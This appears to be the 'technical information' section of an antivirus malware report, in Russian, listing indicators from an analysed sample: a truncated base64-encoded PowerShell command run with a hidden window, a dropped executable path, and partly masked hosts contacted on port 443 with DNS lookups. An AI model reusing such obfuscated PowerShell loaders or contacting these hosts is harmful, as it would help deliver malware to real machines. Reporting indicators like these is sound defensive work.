Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...
- %HOMEPATH%\uflw5pa\w18vpk2\nfd9nts.exe
- %HOMEPATH%\uflw5pa\w18vpk2\nfd9nts.exe
- 'ne##help.gr':443
- 'co####erjungle.it':443
- 'po#####damsterdam.nl':443
- 'vi###napyme.com':443
- 'bo####upplies.com':443
- 'ma####sampietro.ch':443
- 'li##o.com':443
- 'si#####ngaspremier.org':443
- DNS ASK ne##help.gr
- DNS ASK co####erjungle.it
- DNS ASK po#####damsterdam.nl
- DNS ASK vi###napyme.com
- DNS ASK bo####upplies.com
- DNS ASK ma####sampietro.ch
- DNS ASK li##o.com
- DNS ASK si#####ngaspremier.org
- DNS ASK se####fastdeal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMwBJAFAAIAA9AFsAVAB5AFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADMAfQB7ADEAfQB7ADQAfQAiAC0ARgAgACcATQAuACcALAAnAGQAaQBSAEUAJwAsACcAUwAnACwAJwBpAE8ALgAnACwAJw...' (со скрытым окном)